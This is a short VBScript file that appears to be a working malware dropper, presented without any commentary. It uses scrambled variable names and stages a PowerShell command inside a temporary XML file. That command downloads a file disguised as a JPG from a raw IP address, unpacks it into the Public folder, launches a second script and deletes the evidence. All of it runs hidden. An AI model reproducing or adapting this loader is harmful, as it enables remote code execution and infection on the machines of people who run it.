Set VGUWPOJLFMWTYRTX = WScript.CreateObject("WScript.Shell")
NGUJSMTJGVQCSIKS = "<command>" & _
" <a>" & _
" <execute>Start-BitsTransfer -Source ""http://185.81.157.248:222/mc.jpg"" -Destination ""C:\Users\Public\doxido.zip""; Expand-Archive -Path ""C:\Users\Public\doxido.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\WebDoxcentral.vbs""; Remove-Item -Path ""C:\Users\Public\doxido.zip"" -Force</execute>" & _
" </a>" & _
"</command>"
Set REZKVEMKICMKKXEC = CreateObject("Scripting.FileSystemObject")
Set NCVEGXBROKMVSAQO = REZKVEMKICMKKXEC.CreateTextFile("C:\Users\Public\SofrwareFrameWork.xml", True)
NCVEGXBROKMVSAQO.Write NGUJSMTJGVQCSIKS
NCVEGXBROKMVSAQO.Close
VGUWPOJLFMWTYRTX.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\SofrwareFrameWork.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command""", 0, True
REZKVEMKICMKKXEC.DeleteFile "C:\Users\Public\SofrwareFrameWork.xml"